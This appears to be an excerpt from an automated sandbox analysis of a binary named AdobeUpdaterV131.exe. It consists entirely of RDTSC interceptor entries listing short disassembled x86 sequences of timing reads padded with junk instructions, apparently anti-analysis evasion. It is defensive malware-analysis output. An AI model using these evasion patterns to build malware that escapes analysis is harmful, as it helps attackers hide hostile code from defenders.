            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947ED5 second address: 947EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0731CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947EE1 second address: 947EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947EE7 second address: 947EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947EEB second address: 947EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948168 second address: 94816E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948634 second address: 948638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948638 second address: 948664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB1h 0x00000012 ja 00007F09D0731CA8h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948664 second address: 94866C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9487D4 second address: 9487F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948942 second address: 94894C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0D9C3D6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94894C second address: 948966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948966 second address: 94896D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 948DEE second address: 948E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94E4E9 second address: 94E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94E687 second address: 94E68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94E68F second address: 94E6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94E6AD second address: 94E6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 951521 second address: 951525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 951525 second address: 951529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 951529 second address: 95155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F09D0D9C3E2h 0x0000000d jmp 00007F09D0D9C3E0h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F09D0D9C3D6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9517BA second address: 9517DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9517DB second address: 9517E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9517E1 second address: 9517E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9532FA second address: 953332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F09D0D9C3E9h 0x0000000b popad 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 95957F second address: 959585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 958863 second address: 958875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F09D0D9C3D8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 958875 second address: 95887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 958DA2 second address: 958DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F09D0D9C3D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 958DB1 second address: 958DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CB6h 0x00000013 jmp 00007F09D0731CB8h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 958DED second address: 958E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9590C2 second address: 9590CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9590CD second address: 9590E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F09D0D9C3E6h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9590E9 second address: 959158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F09D0731CB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F09D0731CB8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F09D0731CB9h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f jmp 00007F09D0731CABh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 959158 second address: 95917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F09D0D9C3EEh 0x0000000b jmp 00007F09D0D9C3E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 95917B second address: 959180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 95DD2C second address: 95DD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F09D0D9C3D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 95DFE3 second address: 95DFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 jg 00007F09D0731CCCh 0x0000000c pushad 0x0000000d jne 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90B21B second address: 90B252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90B252 second address: 90B297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx edi, si 0x0000000d mov ebx, dword ptr [ebp+1247E35Eh] 0x00000013 mov edx, dword ptr [ebp+122D355Ch] 0x00000019 add eax, ebx 0x0000001b jns 00007F09D0731CABh 0x00000021 nop 0x00000022 jmp 00007F09D0731CACh 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a jnl 00007F09D0731CA6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90B297 second address: 90B29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90B29F second address: 90B2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 95E296 second address: 95E2AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0D9C3DDh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9619FC second address: 961A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961A00 second address: 961A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C10 second address: 961C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C14 second address: 961C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C1A second address: 961C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C20 second address: 961C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C26 second address: 961C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 961C2C second address: 961C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96951D second address: 969525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 969525 second address: 969529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 969529 second address: 96952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96A022 second address: 96A039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jl 00007F09D0D9C3E0h 0x0000000d jmp 00007F09D0D9C3DAh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96A039 second address: 96A041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96A041 second address: 96A045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96A644 second address: 96A64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96A927 second address: 96A92D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96B1EC second address: 96B1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96CBC5 second address: 96CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F09D0D9C3D6h 0x0000000b jns 00007F09D0D9C3D6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F09D0D9C3D6h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 96CBE1 second address: 96CBE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 971622 second address: 971627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 971627 second address: 97162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97162D second address: 971631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 971631 second address: 97164D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F09D0731CA6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 974AFD second address: 974B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 jmp 00007F09D0D9C3E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 974F39 second address: 974F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9750E5 second address: 9750F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F09D0D9C3DCh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9750F6 second address: 975100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F09D0731CA6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 975100 second address: 975114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97528E second address: 97529C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97D89E second address: 97D8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97D8A6 second address: 97D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DB3C second address: 97DB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DE28 second address: 97DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DFB0 second address: 97DFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DFB5 second address: 97DFE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c js 00007F09D0731CA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F09D0731CABh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DFE8 second address: 97DFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97DFFE second address: 97E002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97E16E second address: 97E184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97F3AC second address: 97F3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 97D34B second address: 97D369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F09D0D9C3D6h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jnl 00007F09D0D9C3D6h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 985B4B second address: 985B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F09D0731CA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9968EA second address: 9968F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 998822 second address: 998845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F09D0731CB9h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 998845 second address: 99884B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 99884B second address: 998851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9A4D1F second address: 9A4D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9A4D23 second address: 9A4D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9A4D2F second address: 9A4D56 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9A4D56 second address: 9A4D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F09D0731CB9h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F09D0731CA6h 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9B2552 second address: 9B256F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
